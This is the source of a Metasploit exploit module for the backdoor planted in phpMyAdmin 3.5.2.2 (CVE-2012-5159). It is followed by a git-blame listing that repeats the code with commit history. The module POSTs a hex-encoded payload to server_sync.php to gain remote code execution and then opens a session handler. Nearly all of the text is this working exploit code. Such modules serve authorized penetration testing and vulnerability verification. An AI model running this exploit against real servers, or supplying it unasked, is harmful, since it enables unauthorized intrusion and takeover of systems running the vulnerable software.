modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
      'Description'    => %q{
          This module exploits an arbitrary code execution backdoor
        placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-5159' ],
          [ 'OSVDB', '85739' ],
          [ 'EDB', '21834' ],
          [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144, # 256k
        },
      'DefaultOptions' =>
        {
          'WfsDelay' => 30
        },
      'DisclosureDate' => 'Sep 25 2012',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget' => 0))

    register_options([
      OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin'])
    ])
  end

  def exploit

    uris = []

    tpath = datastore['PATH']
    if tpath[-1,1] == '/'
      tpath = tpath.chop
    end

    pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%")

    res = send_request_raw( {
      'global'  => true,
      'uri'     => tpath + "/server_sync.php",
      'method'  => 'POST',
      'data'    => pdata,
      'headers' => {
        'Content-Type'   => 'application/x-www-form-urlencoded',
        'Content-Length' => pdata.length,
      }
    }, 1.0)

    handler
  end
end
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = NormalRanking`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::HttpClient`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',`
			`'Description' => %q{`
			`This module exploits an arbitrary code execution backdoor`
Spelling Fix 2016-03-19 13:58:13 -04:00			`placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.`
Retab modules 2013-08-30 16:28:54 -05:00			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2012-5159' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '85739' ],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'EDB', '21834' ],`
			`[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
			`'ConnectionType' => 'find',`
			`},`
			`# Arbitrary big number. The payload gets sent as an HTTP`
			`# response body, so really it's unlimited`
			`'Space' => 262144, # 256k`
			`},`
			`'DefaultOptions' =>`
			`{`
			`'WfsDelay' => 30`
			`},`
			`'DisclosureDate' => 'Sep 25 2012',`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0))`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`register_options([`
			`OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin'])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`uris = []`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`tpath = datastore['PATH']`
			`if tpath[-1,1] == '/'`
			`tpath = tpath.chop`
			`end`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%")`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`res = send_request_raw( {`
			`'global' => true,`
			`'uri' => tpath + "/server_sync.php",`
			`'method' => 'POST',`
			`'data' => pdata,`
			`'headers' => {`
			`'Content-Type' => 'application/x-www-form-urlencoded',`
			`'Content-Length' => pdata.length,`
			`}`
			`}, 1.0)`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`handler`
			`end`
Add exploit for phpmyadmin backdoor 2012-09-25 10:47:30 -05:00			`end`